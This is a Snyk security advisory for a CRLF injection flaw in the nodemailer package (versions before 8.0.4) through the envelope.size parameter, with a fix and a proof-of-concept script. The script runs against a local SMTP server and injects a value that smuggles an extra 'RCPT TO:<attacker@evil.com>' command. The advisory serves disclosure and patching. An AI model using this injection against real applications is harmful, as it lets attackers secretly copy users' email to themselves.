CRLF Injection Affecting nodemailer package, versions <8.0.4
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-NODEMAILER-15790064
- published27 Mar 2026
- disclosed26 Mar 2026
- creditesquilichi
Introduced: 26 Mar 2026
New CVE NOT AVAILABLE CWE-93 (opens in a new tab)How to fix?
Upgrade nodemailer to version 8.0.4 or higher.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.
Note:
This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.
PoC
const net = require('net');
const nodemailer = require('nodemailer');
// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
socket.write('220 localhost ESMTP\r\n');
let buffer = '';
socket.on('data', chunk => {
buffer += chunk.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('C:', line);
if (line.startsWith('EHLO')) {
socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
} else if (line.startsWith('MAIL FROM')) {
socket.write('250 OK\r\n');
} else if (line.startsWith('RCPT TO')) {
socket.write('250 OK\r\n');
} else if (line === 'DATA') {
socket.write('354 Start\r\n');
} else if (line === '.') {
socket.write('250 OK\r\n');
} else if (line.startsWith('QUIT')) {
socket.write('221 Bye\r\n');
socket.end();
}
}
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
console.log('SMTP server on port', port);
console.log('Sending email with injected RCPT TO...\n');
const transporter = nodemailer.createTransport({
host: '127.0.0.1',
port,
secure: false,
tls: { rejectUnauthorized: false },
});
transporter.sendMail({
from: 'sender@example.com',
to: 'recipient@example.com',
subject: 'Normal email',
text: 'This is a normal email.',
envelope: {
from: 'sender@example.com',
to: ['recipient@example.com'],
size: '100\r\nRCPT TO:<attacker@evil.com>',
},
}, (err) => {
if (err) console.error('Error:', err.message);
console.log('\nExpected output above:');
console.log(' C: MAIL FROM:<sender@example.com> SIZE=100');
console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED');
console.log(' C: RCPT TO:<recipient@example.com>');
server.close();
transporter.close();
});
});